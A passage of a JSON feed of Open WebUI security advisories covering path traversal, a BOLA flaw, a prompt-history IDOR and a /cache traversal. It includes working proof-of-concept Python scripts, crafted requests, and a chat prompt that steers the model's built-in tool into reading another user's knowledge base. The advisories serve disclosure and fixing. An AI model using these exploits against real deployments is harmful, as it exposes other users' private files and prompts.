unintended endpoints and files, and, where the terminal server routes onward to internal services, reach those services. CWE-22 (Path Traversal) and CWE-918 (SSRF).\n\n### Fix\n\nDecode the proxy path until it is stable before normalising and checking, so no depth of encoding can smuggle a traversal sequence past the check to be re-decoded upstream:\n\n```python\ndecoded = path\nfor _ in range(8):\n    once = unquote(decoded)\n    if once == decoded:\n        break\n    decoded = once\nnormalized = posixpath.normpath(decoded)\ncleaned = normalized.lstrip('/')\nif cleaned.startswith('..') or cleaned == '.':\n    return None\n```\n\nThis rejects `%2e%2e`, `%252e%252e`, `%25252e%25252e`, `..%2f..%2f`, etc., while leaving legitimate paths (including singly-encoded characters such as `%20`) intact.\n\n### Credits\n\n- **Tulgaaaaaaaa** — original report (terminal-proxy path SSRF / single-encoded traversal).\n- **sermikr0** — double-encoded (`%252e%252e`) bypass of the `_sanitize_proxy_path` mitigation.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-17T17:55:28.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.7,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-r2wg-2mcr-66rv","https://nvd.nist.gov/vuln/detail/CVE-2026-54017","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2751.yaml","https://pypi.org/project/open-webui","https://github.com/advisories/GHSA-r2wg-2mcr-66rv"],"source_kind":"github","identifiers":["GHSA-r2wg-2mcr-66rv","CVE-2026-54017"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T18:00:08.591Z","updated_at":"2026-09-03T03:02:03.256Z","epss_percentage":0.00522,"epss_percentile":0.4157,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMndnLTJtY3ItNjZyds4ABY4m","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yMndnLTJtY3ItNjZyds4ABY4m","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yMndnLTJtY3ItNjZyds4ABY4m/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jeDl2LTRxajItanJ3Ns4ABY4k","url":"https://github.com/advisories/GHSA-cx9v-4qj2-jrw6","title":"Open WebUI BOLA: `search_knowledge_files` Allows Unauthorized Knowledge Base File Enumeration","description":"## Summary\n\nOpen WebUI has a Broken Object Level Authorization (BOLA) vulnerability in the builtin `search_knowledge_files` tool.\n\nWhen native function calling is enabled and the selected model has no attached knowledge bases, an authenticated user can call `search_knowledge_files` with an arbitrary `knowledge_id`. The function then returns file metadata from that knowledge base without checking whether the user has read access.\n\nThis allows unauthorized enumeration of private or restricted knowledge base files.\n\n## Details\n\nThe vulnerable code is in:\n\n`backend/open_webui/tools/builtin.py`\n\nAffected function:\n\n```python\nasync def search_knowledge_files(\n    query: str,\n    knowledge_id: Optional[str] = None,\n    count: int = 5,\n    skip: int = 0,\n    __request__: Request = None,\n    __user__: dict = None,\n    __model_knowledge__: Optional[list[dict]] = None,\n) -\u003e str:\n```\n\nIn the \"No attached knowledge\" branch, when `knowledge_id` is provided, the function directly calls:\n\n```python\nresult = await Knowledges.search_files_by_id(\n    knowledge_id=knowledge_id,\n    user_id=user_id,\n    filter={\"query\": query},\n    skip=skip,\n    limit=count,\n)\n```\n\nThis code path does not verify that the current user is authorized to access the specified knowledge base.\n\nThe missing check is inconsistent with other nearby code paths. For example, the attached-knowledge branch in the same function checks whether the user is an admin, the owner of the knowledge base, or has explicit read access through `AccessGrants`:\n\n```python\nif not (\n    user_role == \"admin\"\n    or knowledge.user_id == user_id\n    or await AccessGrants.has_access(\n        user_id=user_id,\n        resource_type=\"knowledge\",\n        resource_id=knowledge.id,\n        permission=\"read\",\n        user_group_ids=set(user_group_ids),\n    )\n):\n    continue\n```\n\nThe sibling function `query_knowledge_files` also performs the same authorization check before using user-supplied knowledge base IDs.\n\nThe underlying method `Knowledges.search_files_by_id()` receives `user_id`, but it does not enforce authorization for the provided `knowledge_id`. As a result, this builtin tool path can access a knowledge base by ID without verifying the caller's permissions.\n\n## PoC\n\n### Prerequisites\n\n- The attacker has a valid authenticated Open WebUI account.\n- The victim owns a private or restricted knowledge base.\n- The attacker does not own the target knowledge base.\n- The attacker does not have `read` permission for the target knowledge base in `AccessGrants`.\n- The attacker knows the target `knowledge_id`.\n- The selected model has no attached knowledge bases.\n- Builtin tools are enabled.\n- The knowledge builtin tool category is enabled.\n- Native function calling is enabled.\n\n### Reproduction Steps\n\n1. Create a private or restricted knowledge base as the victim user.\n\n2. Upload one or more files to that knowledge base.\n\n3. Confirm that the attacker user does not have access to the knowledge base.\n\n4. As the attacker user, send a chat completion request with native function calling enabled:\n\n```json\n{\n  \"stream\": true,\n  \"model\": \"gpt-4o-mini\",\n  \"params\": {\n    \"function_calling\": \"native\"\n  },\n  \"messages\": [\n    {\n      \"role\": \"user\",\n      \"content\": \"Please use the search_knowledge_files tool with knowledge_id \\\"c0c84752-2e9d-42bf-bc3c-c0f272aa61c1\\\" to search all files\"\n    }\n  ]\n}\n```\n\nReplace `c0c84752-2e9d-42bf-bc3c-c0f272aa61c1` with the victim's private knowledge base ID.\n\n### Expected Result\n\nThe request should be denied because the attacker does not have access to the target knowledge base.\n\n### Actual Result\n\n`search_knowledge_files` returns metadata for files inside the target knowledge base, including:\n\n- file ID;\n- filename;\n- knowledge base ID;\n- knowledge base name;\n- update timestamp.\n\n## Impact\n\nThis is a Broken Object Level Authorization / Broken Access Control vulnerability.\n\nAn authenticated attacker who knows a valid `knowledge_id` can enumerate files from private or restricted knowledge bases without authorization.\n\nThe leaked metadata may expose sensitive information through filenames, such as:\n\n- financial reports;\n- employee documents;\n- customer contracts;\n- internal roadmap files;\n- confidential project documents.\n\nThe exposed file IDs may also help attackers chain this issue with other knowledge-file access paths, such as `view_knowledge_file`, to attempt further content extraction.\n\nThis vulnerability bypasses the intended `AccessGrants` permission model and may also allow post-revocation metadata access if a user remembers a previously accessible `knowledge_id`.\n\n## Suggested Fix\n\nAdd the same authorization check used in `query_knowledge_files` before calling `Knowledges.search_files_by_id()`:\n\n```python\nif knowledge_id:\n    knowledge = await Knowledges.get_knowledge_by_id(knowledge_id)\n\n    if not knowledge or not (\n        user_role == \"admin\"\n        or knowledge.user_id == user_id\n        or await AccessGrants.has_access(\n            user_id=user_id,\n            resource_type=\"knowledge\",\n            resource_id=knowledge.id,\n            permission=\"read\",\n            user_group_ids=set(user_group_ids),\n        )\n    ):\n        return json.dumps({\"error\": f\"Access denied to knowledge base {knowledge_id}\"})\n\n    result = await Knowledges.search_files_by_id(\n        knowledge_id=knowledge_id,\n        user_id=user_id,\n        filter={\"query\": query},\n        skip=skip,\n        limit=count,\n    )\n```\n\nAs defense in depth, authorization should also be enforced or safely wrapped around `Knowledges.search_files_by_id()` so that future callers cannot accidentally bypass access control.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:31:16.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-cx9v-4qj2-jrw6","https://nvd.nist.gov/vuln/detail/CVE-2026-54016","https://github.com/advisories/GHSA-cx9v-4qj2-jrw6","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2721.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-cx9v-4qj2-jrw6","CVE-2026-54016"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:03.257Z","epss_percentage":0.00304,"epss_percentile":0.22522,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jeDl2LTRxajItanJ3Ns4ABY4k","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jeDl2LTRxajItanJ3Ns4ABY4k","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jeDl2LTRxajItanJ3Ns4ABY4k/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00cjR3LTJ3Z3Atdzdjas4ABY4j","url":"https://github.com/advisories/GHSA-4r4w-2wgp-w7cj","title":"Open WebUI Prompt history IDOR: unbound history_id allows cross-prompt read and deletion","description":"## Summary\n\nOpen WebUI's prompt version-history endpoints authorize the `prompt_id` in the URL but then act on caller-supplied history IDs without verifying that the history row belongs to that prompt (`history_entry.prompt_id == prompt.id`). Three operations are affected:\n\n- `GET /api/v1/prompts/id/{prompt_id}/history/diff` — returns another prompt's history snapshots (read).\n- `POST /api/v1/prompts/id/{prompt_id}/update/version` — restores another prompt's snapshot into the caller's prompt, exposing its content (read).\n- `DELETE /api/v1/prompts/id/{prompt_id}/history/{history_id}` — deletes another prompt's history entry (delete).\n\nAn authenticated user with access to any prompt they control, plus a victim `prompt_history.id`, can read or delete another user's private prompt history. The single-entry read endpoint (`GET .../history/{history_id}`) already enforces the binding; these three did not.\n\n## Impact\n\nSecurity boundary crossed: prompt confidentiality and integrity.\n\nPrompt history snapshots can contain private prompt text, internal instructions, and sensitive variables. With a known victim `prompt_history.id`, an attacker can read another user's snapshot (via the diff endpoint or by restoring it into their own prompt) and delete another user's history entry. The active prompt row is not destroyed; the delete impact is against version history. Exploitation requires knowing or obtaining victim history UUIDs, so severity depends on adjacent ID exposure.\n\n## Root Cause\n\nThe route checks read access only for `prompt_id`:\n\n```python\n# backend/open_webui/routers/prompts.py\nprompt = await Prompts.get_prompt_by_id(prompt_id, db=db)\n...\nif not (\n    user.role == 'admin'\n    or prompt.user_id == user.id\n    or await AccessGrants.has_access(\n        user_id=user.id,\n        resource_type='prompt',\n        resource_id=prompt.id,\n        permission='read',\n        db=db,\n    )\n):\n    raise HTTPException(...)\n```\n\nBut the authorized prompt ID is not passed into the diff sink:\n\n```python\n# backend/open_webui/routers/prompts.py\ndiff = await PromptHistories.compute_diff(from_id, to_id, db=db)\n```\n\n`compute_diff()` fetches both history entries globally by ID and returns their full snapshots:\n\n```python\n# backend/open_webui/models/prompt_history.py\nresult_from = await db.execute(select(PromptHistory).filter(PromptHistory.id == from_id))\nfrom_entry = result_from.scalars().first()\nresult_to = await db.execute(select(PromptHistory).filter(PromptHistory.id == to_id))\nto_entry = result_to.scalars().first()\n...\nreturn {\n    'from_snapshot': from_snapshot,\n    'to_snapshot': to_snapshot,\n    ...\n}\n```\n\nThere is no check that `from_entry.prompt_id == prompt_id` or `to_entry.prompt_id == prompt_id`.\n\nThe same missing binding affects two further endpoints. `POST .../update/version` restores a snapshot fetched globally by `version_id`:\n\n```python\n# backend/open_webui/models/prompts.py — update_prompt_version\nhistory_entry = await PromptHistories.get_history_entry_by_id(version_id, db=session)\n...\nprompt.content = snapshot.get('content', prompt.content)   # foreign snapshot copied into caller's prompt\nprompt.version_id = version_id\n```\n\n`DELETE .../history/{history_id}` deletes an entry fetched globally by `history_id`:\n\n```python\n# backend/open_webui/models/prompt_history.py — delete_history_entry\nresult = await db.execute(select(PromptHistory).filter_by(id=history_id))\nentry = result.scalars().first()\n...\nawait db.delete(entry)\n```\n\nNeither checks `entry.prompt_id == prompt.id`. The single-entry read endpoint (`GET .../history/{history_id}`) does (`history_entry.prompt_id != prompt.id → 404`); these three endpoints were missing it.\n\n## PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPoC for prompt history diff IDOR.\n\nThe PoC executes:\n  - the real routers.prompts.get_prompt_diff() route function\n  - the real PromptHistories.compute_diff() implementation\n\nFake model/DB adapters are used only to avoid requiring a running server. The\nsecurity-sensitive behavior under test is that the route authorizes the prompt\nID in the URL, then computes a diff for arbitrary history IDs without checking\nthat those history rows belong to the authorized prompt.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport asyncio\nimport json\nimport os\nimport sys\nimport types\nfrom pathlib import Path\nfrom types import SimpleNamespace\n\n\ndef prepare_imports() -\u003e None:\n    repo_root = Path(__file__).resolve().parents[1]\n    sys.path.insert(0, str(repo_root / \"backend\"))\n    os.environ[\"VECTOR_DB\"] = \"none\"\n\n    class DummyTyper:\n        def command(self, *args, **kwargs):\n            return lambda fn: fn\n\n    sys.modules.setdefault(\n        \"typer\",\n        types.SimpleNamespace(\n            Typer=lambda *args, **kwargs: DummyTyper(),\n            Option=lambda *args, **kwargs: None,\n            echo=lambda *args, **kwargs: None,\n            Exit=Exception,\n        ),\n    )\n    sys.modules.setdefault(\"uvicorn\", types.SimpleNamespace(run=lambda *args, **kwargs: None))\n\n\nclass FakeScalarResult:\n    def __init__(self, row):\n        self.row = row\n\n    def first(self):\n        return self.row\n\n\nclass FakeExecuteResult:\n    def __init__(self, row):\n        self.row = row\n\n    def scalars(self):\n        return FakeScalarResult(self.row)\n\n\nclass FakePromptHistoryDb:\n    def __init__(self, rows):\n        self.rows = rows\n        self.calls = 0\n\n    async def execute(self, stmt):\n        row = self.rows[self.calls]\n        self.calls += 1\n        return FakeExecuteResult(row)\n\n\nclass FakeDbContext:\n    def __init__(self, db):\n        self.db = db\n\n    async def __aenter__(self):\n        return self.db\n\n    async def __aexit__(self, exc_type, exc, tb):\n        return False\n\n\nasync def run_real_compute_diff(from_id: str, to_id: str):\n    import open_webui.models.prompt_history as history_module\n\n    victim_from = SimpleNamespace(\n        id=from_id,\n        prompt_id=\"victim-prompt\",\n        snapshot={\n            \"name\": \"Victim Prompt\",\n            \"command\": \"/victim\",\n            \"content\": \"PRIVATE_PROMPT_SECRET_V1\",\n        },\n    )\n    victim_to = SimpleNamespace(\n        id=to_id,\n        prompt_id=\"victim-prompt\",\n        snapshot={\n            \"name\": \"Victim Prompt\",\n            \"command\": \"/victim\",\n            \"content\": \"PRIVATE_PROMPT_SECRET_V2\",\n        },\n    )\n\n    fake_db = FakePromptHistoryDb([victim_from, victim_to])\n    original_context = history_module.get_async_db_context\n    try:\n        history_module.get_async_db_context = lambda db=None: FakeDbContext(fake_db)\n        diff = await history_module.PromptHistories.compute_diff(from_id, to_id)\n    finally:\n        history_module.get_async_db_context = original_context\n\n    return diff\n\n\nasync def main() -\u003e None:\n    prepare_imports()\n\n    import open_webui.routers.prompts as prompts_router\n\n    attacker_prompt = SimpleNamespace(\n        id=\"attacker-prompt\",\n        user_id=\"attacker\",\n    )\n    attacker = SimpleNamespace(id=\"attacker\", role=\"user\")\n    victim_from_id = \"victim-history-from\"\n    victim_to_id = \"victim-history-to\"\n\n    class FakePrompts:\n        looked_up_prompt_ids = []\n\n        async def get_prompt_by_id(self, prompt_id, db=None):\n            self.looked_up_prompt_ids.append(prompt_id)\n            if prompt_id == \"attacker-prompt\":\n                return attacker_prompt\n            return None\n\n    class FakeAccessGrants:\n        async def has_access(self, *args, **kwargs):\n            return False\n\n    class FakePromptHistories:\n        compute_diff_calls = []\n\n        async def compute_diff(self, from_id, to_id, db=None):\n            self.compute_diff_calls.append(\n                {\n                    \"from_id\": from_id,\n                    \"to_id\": to_id,\n                    \"authorized_prompt_id_not_passed\": True,\n                }\n            )\n            return await run_real_compute_diff(from_id, to_id)\n\n    fake_prompts = FakePrompts()\n    fake_histories = FakePromptHistories()\n\n    original = {\n        \"Prompts\": prompts_router.Prompts,\n        \"AccessGrants\": prompts_router.AccessGrants,\n        \"PromptHistories\": prompts_router.PromptHistories,\n    }\n    try:\n        prompts_router.Prompts = fake_prompts\n        prompts_router.AccessGrants = FakeAccessGrants()\n        prompts_router.PromptHistories = fake_histories\n\n        diff = await prompts_router.get_prompt_diff(\n            prompt_id=\"attacker-prompt\",\n            from_id=victim_from_id,\n            to_id=victim_to_id,\n            user=attacker,\n            db=None,\n        )\n    finally:\n        for name, value in original.items():\n            setattr(prompts_router, name, value)\n\n    result = {\n        \"confirmed\": (\n            diff.get(\"from_snapshot\", {}).get(\"content\") == \"PRIVATE_PROMPT_SECRET_V1\"\n            and diff.get(\"to_snapshot\", {}).get(\"content\") == \"PRIVATE_PROMPT_SECRET_V2\"\n            and fake_prompts.looked_up_prompt_ids == [\"attacker-prompt\"]\n            and fake_histories.compute_diff_calls\n            and fake_histories.compute_diff_calls[0][\"authorized_prompt_id_not_passed\"] is True\n        ),\n        \"attacker_user_id\": \"attacker\",\n        \"authorized_prompt_id\": \"attacker-prompt\",\n        \"victim_prompt_id\": \"victim-prompt\",\n        \"victim_history_ids\": [victim_from_id, victim_to_id],\n        \"prompt_ids_authorized_by_route\": fake_prompts.looked_up_prompt_ids,\n        \"compute_diff_calls\": fake_histories.compute_diff_calls,\n        \"leaked_from_snapshot\": diff.get(\"from_snapshot\"),\n        \"leaked_to_snapshot\": diff.get(\"to_snapshot\"),\n        \"source\": {\n            \"route\": \"backend/open_webui/routers/prompts.py:get_prompt_diff\",\n            \"sink\": \"backend/open_webui/models/prompt_history.py:PromptHistories.compute_diff\",\n        },\n    }\n    print(json.dumps(result, indent=2, sort_keys=True))\n    if not result[\"confirmed\"]:\n        raise SystemExit(1)\n\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n```\n\nThe PoC executes the real route function and the real `PromptHistories.compute_diff()` implementation with fake model/DB adapters. It authorizes the attacker against `attacker-prompt`, then supplies two victim history IDs. The route returns the victim prompt snapshots.\n\nResult:\n\n```json\n{\n  \"attacker_user_id\": \"attacker\",\n  \"authorized_prompt_id\": \"attacker-prompt\",\n  \"confirmed\": true,\n  \"leaked_from_snapshot\": {\n    \"command\": \"/victim\",\n    \"content\": \"PRIVATE_PROMPT_SECRET_V1\",\n    \"name\": \"Victim Prompt\"\n  },\n  \"leaked_to_snapshot\": {\n    \"command\": \"/victim\",\n    \"content\": \"PRIVATE_PROMPT_SECRET_V2\",\n    \"name\": \"Victim Prompt\"\n  },\n  \"prompt_ids_authorized_by_route\": [\n    \"attacker-prompt\"\n  ],\n  \"victim_history_ids\": [\n    \"victim-history-from\",\n    \"victim-history-to\"\n  ],\n  \"victim_prompt_id\": \"victim-prompt\"\n}\n```\n\n## Exploit Sketch\n\nRead via the diff endpoint:\n\n1. Attacker has read access to `ATTACKER_PROMPT_ID`.\n2. Attacker knows two history IDs for a victim prompt: `VICTIM_FROM_HISTORY_ID` and `VICTIM_TO_HISTORY_ID`.\n3. Attacker requests:\n\n```text\nGET /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/diff?from_id=VICTIM_FROM_HISTORY_ID\u0026to_id=VICTIM_TO_HISTORY_ID\n```\n\n4. The server authorizes `ATTACKER_PROMPT_ID`, then returns snapshots for the victim history IDs.\n\nRead via restore (`update/version`): the attacker `POST`s `{\"version_id\": \"VICTIM_HISTORY_ID\"}` to their own prompt's `update/version`, then `GET`s their prompt; it now holds the victim snapshot's name/content/data/meta/tags.\n\nDelete: the attacker sends `DELETE /api/v1/prompts/id/ATTACKER_PROMPT_ID/history/VICTIM_HISTORY_ID`; the victim history entry is removed.\n\n## Recommended Fix\n\nBind every prompt-history operation to the authorized prompt before acting on a history ID, mirroring the single-entry read endpoint:\n\n- `compute_diff()` should accept `prompt_id` and query both entries with `PromptHistory.prompt_id == prompt_id` alongside the id filter.\n- `delete_history_entry()` should accept `prompt_id` and filter `filter_by(id=history_id, prompt_id=prompt_id)`.\n- `update_prompt_version()` should reject `history_entry.prompt_id != prompt_id` before restoring.\n\nReturn 404/403 on mismatch.\n\n## Consolidation\n\nPer our Report Handling policy this consolidates independent reports of the same prompt-history authorization flaw (one missing `history_entry.prompt_id == prompt.id` binding) reached through different endpoints:\n\n- Diff-endpoint read and history deletion: @0xEr3n (earliest filings).\n- `update/version` restore-read: distinct path demonstrated by @5yu4n.\n\nOne CVE for the consolidated advisory.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:16:50.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.4,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-4r4w-2wgp-w7cj","https://nvd.nist.gov/vuln/detail/CVE-2026-54015","https://github.com/advisories/GHSA-4r4w-2wgp-w7cj","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2701.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-4r4w-2wgp-w7cj","CVE-2026-54015"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:03.257Z","epss_percentage":0.00269,"epss_percentile":0.18567,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cjR3LTJ3Z3Atdzdjas4ABY4j","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00cjR3LTJ3Z3Atdzdjas4ABY4j","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00cjR3LTJ3Z3Atdzdjas4ABY4j/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qMmM4LXY5NjktOHI1Y84ABY4i","url":"https://github.com/advisories/GHSA-j2c8-v969-8r5c","title":"Open WebUI: Sibling-Prefix Path Traversal via /cache/{path}","description":"## Summary\n\nA path traversal vulnerability exists in open-webui's cache file serving endpoint that allows any authenticated user to read files from sibling directories outside the intended cache directory, by exploiting an incomplete `startswith` containment check that lacks a trailing path separator.\n\nThe root cause is that `serve_cache_file()` in `open_webui/main.py` validates the resolved path with `file_path.startswith(os.path.abspath(CACHE_DIR))` — without appending `os.sep`. This allows any path resolving to a sibling directory whose name begins with `cache` (e.g. `cache_sibling`, `cache_backup`, `cached_models`) to pass validation.\n\nDeep traversal and absolute paths are correctly blocked. The bypass is narrow but confirmed — limited to sibling-prefix directories.\n\n### Exploitation constraints\n\n| Constraint | Detail |\n|---|---|\n| Auth required | `get_verified_user` — any user with role `user` or `admin` |\n| Scope | Only sibling directories starting with `cache` (e.g. `cache_backup`, `cached_models`) |\n| Deep traversal | Blocked — `../../etc/passwd` correctly fails the startswith check |\n| Absolute paths | Blocked — `/etc/passwd` correctly fails |\n| Client normalization | httpx/browsers normalize `..` client-side — must use raw HTTP or ASGI to deliver payload |\n\n## Vulnerability Details\n\n### Vulnerable function: `serve_cache_file()`\n\n```python\n# open_webui/main.py, line 2907-2924\n@app.get('/cache/{path:path}')\nasync def serve_cache_file(path: str, user=Depends(get_verified_user)):\n    file_path = os.path.abspath(os.path.join(CACHE_DIR, path))\n    # prevent path traversal\n    if not file_path.startswith(os.path.abspath(CACHE_DIR)):   # ← BUG: no trailing os.sep\n        raise HTTPException(status_code=404, detail='File not found')\n    if not os.path.isfile(file_path):\n        raise HTTPException(status_code=404, detail='File not found')\n    return FileResponse(file_path, headers=headers)\n```\n\n### The bypass\n\n```python\nCACHE_DIR = \"/data/cache\"\n\n# Attacker path: \"../cache_sibling/secret.txt\"\nfile_path = os.path.abspath(os.path.join(\"/data/cache\", \"../cache_sibling/secret.txt\"))\n# → \"/data/cache_sibling/secret.txt\"\n\n\"/data/cache_sibling/secret.txt\".startswith(\"/data/cache\")\n# → True  ← BYPASS (because \"cache_sibling\" starts with \"cache\")\n\n# Correct check would be:\n\"/data/cache_sibling/secret.txt\".startswith(\"/data/cache/\")\n# → False  ← BLOCKED\n```\n\n## Proof of Concept\n\n### Environment\n\n| Component | Detail |\n|-----------|--------|\n| open-webui | 0.9.5 (pip installed) |\n| Python | 3.11 |\n| Import | `from open_webui.main import app` (true import, real FastAPI app) |\n| Method | Raw ASGI request (bypasses httpx client-side `..` normalization) |\n\n### poc.py\n\n```python\n\nimport asyncio\nimport os\nimport shutil\nimport sys\nimport tempfile\nTEMP_DATA = tempfile.mkdtemp(prefix=\"owui_poc_\")\nos.environ[\"DATA_DIR\"] = TEMP_DATA\nos.environ[\"WEBUI_SECRET_KEY\"] = \"poc_secret_key_12345\"\nos.environ[\"WEBUI_AUTH\"] = \"false\"\nCACHE_DIR = os.path.join(TEMP_DATA, \"cache\")\nSIBLING_DIR = os.path.join(TEMP_DATA, \"cache_sibling\")\nos.makedirs(CACHE_DIR, exist_ok=True)\nos.makedirs(SIBLING_DIR, exist_ok=True)\n\nSECRET_CONTENT = \"STOLEN_FROM_SIBLING_DIR\"\nwith open(os.path.join(SIBLING_DIR, \"secret.txt\"), \"w\") as f:\n    f.write(SECRET_CONTENT)\nwith open(os.path.join(CACHE_DIR, \"legit.txt\"), \"w\") as f:\n    f.write(\"legitimate_cache_file\")\nfrom open_webui.main import app\nfrom open_webui.utils.auth import get_verified_user\nclass FakeUser:\n    id = \"poc\"\n    email = \"poc@test\"\n    role = \"user\"\n\napp.dependency_overrides[get_verified_user] = lambda: FakeUser()\nasync def raw_asgi_get(app, path):\n    \"\"\"Send a raw ASGI request without client-side path normalization.\"\"\"\n    scope = {\n        \"type\": \"http\",\n        \"method\": \"GET\",\n        \"path\": path,\n        \"query_string\": b\"\",\n        \"headers\": [(b\"host\", b\"localhost\")],\n        \"root_path\": \"\",\n        \"asgi\": {\"version\": \"3.0\"},\n    }\n    response_started = False\n    status_code = None\n    body_parts = []\n\n    async def receive():\n        return {\"type\": \"http.request\", \"body\": b\"\"}\n\n    async def send(message):\n        nonlocal response_started, status_code\n        if message[\"type\"] == \"http.response.start\":\n            response_started = True\n            status_code = message[\"status\"]\n        elif message[\"type\"] == \"http.response.body\":\n            body_parts.append(message.get(\"body\", b\"\"))\n\n    await app(scope, receive, send)\n    return status_code, b\"\".join(body_parts)\n\n\nasync def main():\n    s1, b1 = await raw_asgi_get(app, \"/cache/legit.txt\")\n    s2, b2 = await raw_asgi_get(app, \"/cache/../cache_sibling/secret.txt\")\n    s3, b3 = await raw_asgi_get(app, \"/cache/../../etc/passwd\")\n\n    baseline_ok = s1 == 200 and b\"legitimate_cache_file\" in b1\n    exploit_ok = s2 == 200 and SECRET_CONTENT.encode() in b2\n    deep_blocked = s3 == 404\n\n    print(f\"package:     open_webui (pip installed)\")\n    print(f\"version:     0.9.5\")\n    print(f\"function:    serve_cache_file (GET /cache/{{path}})\")\n    print(f\"sink:        main.py:2914  file_path.startswith(os.path.abspath(CACHE_DIR))\")\n    print(f\"bypass:      startswith without trailing os.sep allows sibling-prefix match\")\n    print()\n    print(f\"CACHE_DIR:   {CACHE_DIR}\")\n    print(f\"SIBLING:     {SIBLING_DIR}\")\n    print()\n    print(f\"[baseline] /cache/legit.txt            status={s1} body={b1[:40]!r}\")\n    print(f\"[exploit]  /cache/../cache_sibling/secret.txt  status={s2} body={b2[:40]!r}\")\n    print(f\"[control]  /cache/../../etc/passwd     status={s3} (should be 404)\")\n    print()\n    print(f\"result:      {'VULNERABLE' if exploit_ok and baseline_ok and deep_blocked else 'NOT CONFIRMED'}\")\n\n    shutil.rmtree(TEMP_DATA, ignore_errors=True)\n    sys.exit(0 if exploit_ok else 1)\n\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n\n```\n\n### PoC output \n\n\u003cimg width=\"1392\" height=\"288\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2fbef163-9ef5-4ed5-aa53-a49bd9bf4713\" /\u003e\n\n\n## Suggested Fix\n\n```python\nif not file_path.startswith(os.path.abspath(CACHE_DIR) + os.sep):\n    raise HTTPException(status_code=404, detail='File not found')\n```\n\nSingle character fix: append `os.sep` to the prefix in the `startswith` check.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T14:16:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-j2c8-v969-8r5c","https://nvd.nist.gov/vuln/detail/CVE-2026-54014","https://github.com/advisories/GHSA-j2c8-v969-8r5c","https://github.com/open-webui/open-webui","https://github.com/pypa/advisory-database/tree/main/vulns/open-webui/PYSEC-2026-2736.yaml","https://pypi.org/project/open-webui"],"source_kind":"github","identifiers":["GHSA-j2c8-v969-8r5c","CVE-2026-54014"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T15:00:08.452Z","updated_at":"2026-09-03T03:02:03.258Z","epss_percentage":0.00361,"epss_percentile":0.28743,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qMmM4LXY5NjktOHI1Y84ABY4i","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qMmM4LXY5NjktOHI1Y84ABY4i","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.6","vulnerable_version_range":"\u003c= 0.9.5"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qMmM4LXY5NjktOHI1Y84ABY4i/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12MnFtLTV3eGotcWhqN84ABY4h","url":"https://github.com/advisories/GHSA-v2qm-5wxj-qhj7","title":"Open WebUI: Stored XSS to 